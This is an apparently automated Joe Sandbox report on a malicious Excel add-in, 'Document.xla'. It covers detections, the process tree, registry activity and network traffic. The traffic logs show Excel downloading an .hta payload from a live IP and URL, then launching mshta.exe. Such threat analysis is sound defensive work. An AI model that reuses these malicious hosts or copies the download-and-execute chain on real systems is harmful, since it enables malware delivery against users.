Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document.xla

Overview

General Information

Sample name:Document.xla
Analysis ID:1576626
MD5:d4c6ac821c22be30144711786c736a1a
SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64native
  • EXCEL.EXE (PID: 2744 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 14243BD2CC9F1814023132241A51E1C6)
    • mshta.exe (PID: 6512 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • splwow64.exe (PID: 5368 cmdline: C:\Windows\splwow64.exe 12288 MD5: 3F93FFE9B04F940E7B0A1B3267814592)
  • EXCEL.EXE (PID: 6564 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla" MD5: 14243BD2CC9F1814023132241A51E1C6)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 2744, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\createdbetterthingswithgreatnressgivenmebackwithnice[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2744, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 6512, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.174.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2744, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49755
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.11.20, DestinationIsIpv6: false, DestinationPort: 49755, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2744, Protocol: tcp, SourceIp: 170.82.174.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Avira URL Cloud: Label: malware
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodAvira URL Cloud: Label: malware
Source: Document.xlaReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\~DFEB6AEB9B87894B3C.TMPJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\~DF6236E196943C9A91.TMPJoe Sandbox ML: detected
Source: Document.xlaJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.11.20:49755 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: Document.xla, ~DFEB6AEB9B87894B3C.TMP.10.dr, ~DFA747C8484CC23C4D.TMP.10.dr, ~DF6236E196943C9A91.TMP.10.drString found in binary or memory: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.11.20:49755 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\createdbetterthingswithgreatnressgivenmebackwithnice[1].htaJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLA@6/28@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FA5D5D4A.emfJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{AA1FCE4D-8B3A-4B4F-879B-A756573536B5} - OProcSessId.datJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Document.xlaReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Document.xlaStatic file information: File size 1106944 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1145Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
3
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote Services1
Email Collection
1
Encrypted Channel
